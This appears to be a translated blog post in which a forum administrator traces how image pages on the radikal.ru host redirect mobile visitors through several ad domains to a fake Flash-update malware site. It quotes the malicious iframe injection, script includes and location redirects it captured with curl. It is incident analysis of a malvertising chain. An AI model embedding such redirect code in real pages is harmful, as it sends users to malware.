Viruses with a radical. Again!
The story began with a text message “urgently go on Skype” - the client wrote, the owner of one of the sites, which I help in ensuring the viability of this site itself. It turned out that he received a letter from a certain Alexander Goryachev with the statement that the site was most likely infected.
Here is the text of the letter:
The site is a fairly large forum, respectively, users post pictures anywhere, and then put there links in the form that shows them kartinkoohosting. The radical, alas, is one of the most popular.
I tried to repeat the analyst’s actions and scan the traffic that goes to the mobile device. Indeed, a redirect to this newbrwzer occurs, but it’s not quite clear what our site is about. An analysis of traffic has shown that the malicious link itself is given by the radical itself in a manner similar to the following:
Further it sends the browser to the page of the form:
Where the following code occurs:
The link adv-port.com/ctr.php?ref= '+ document.referrer +' has the following code:
This link has the following code:
Downloading this link produces the following:
Those. In the end, the browser really gets on the page with the offer to "update" the flash player. A little later, it turned out that some users really "update" it: yarportal.ru/topic332505.html
Following the results of this “investigation” 3 questions arise:
PS: The analyst is indeed related to Dr.Web, his article is on the habre in office. a blog company habrahabr.ru/company/drweb/blog/142993
UPD: do not use the radical - this, of course, a great idea, it is a pity, very close to utopia. Much more interesting is why there are regularly viruses there, and how many more of the same “updates” managed to be delivered from this site, the audience at the radical hoo)
UPD2: no need to offer alternatives to the radical, I already know them, thank you.
Here is the text of the letter:
Hello.
My name is Alexander Goryachev, I am an analyst at Doctor Web.
')
There is information that when opening images in this topic, yarportal.ru/topic324608s0.html on the form yarportal.ru is redirected from the hosting site radikal.ru to a fraudulent website that distributes mobile malwares under the guise of software updates. That is, if you are using a mobile device (phone, smartphone), the first open page radikal.ru with the right image, but then almost immediately a redirect to a fraudulent site (for example - newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413). If you open images directly on the hosting itself, without an intermediate link in the face of yarportal.ru, this behavior is not observed. Perhaps, yarportal.ru was hacked or it uses an unfair advertising model, which the portal owners may not be aware of.
From the contact information the most appropriate was yours, so it was decided to report on it. Can you somehow comment on the situation and address this issue? We would be grateful if you can provide any information.
Thank.
The site is a fairly large forum, respectively, users post pictures anywhere, and then put there links in the form that shows them kartinkoohosting. The radical, alas, is one of the most popular.
I tried to repeat the analyst’s actions and scan the traffic that goes to the mobile device. Indeed, a redirect to this newbrwzer occurs, but it’s not quite clear what our site is about. An analysis of traffic has shown that the malicious link itself is given by the radical itself in a manner similar to the following:
$ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port <script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script> Further it sends the browser to the page of the form:
http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5&referrer=http://yarportal.ru/topic324608s0.html&lang=en Where the following code occurs:
<script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script> The link adv-port.com/ctr.php?ref= '+ document.referrer +' has the following code:
function error() { top.location='http://network-sitead.com/'; } This link has the following code:
<script src='http://on-line-adv.com/2.php'></script> Downloading this link produces the following:
document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413' Those. In the end, the browser really gets on the page with the offer to "update" the flash player. A little later, it turned out that some users really "update" it: yarportal.ru/topic332505.html
Following the results of this “investigation” 3 questions arise:
- When will the radical die with this kind of advertising policy? This is not the first case of the spread of viruses through them.
- Where do analysts who do not bother to look at traffic via wireshark / tcpdump take analysts to Dr.Web?
- Or maybe it's just I'm a fool and the site is really infected? :)
PS: The analyst is indeed related to Dr.Web, his article is on the habre in office. a blog company habrahabr.ru/company/drweb/blog/142993
UPD: do not use the radical - this, of course, a great idea, it is a pity, very close to utopia. Much more interesting is why there are regularly viruses there, and how many more of the same “updates” managed to be delivered from this site, the audience at the radical hoo)
UPD2: no need to offer alternatives to the radical, I already know them, thank you.
Source: https://habr.com/ru/post/144819/
All Articles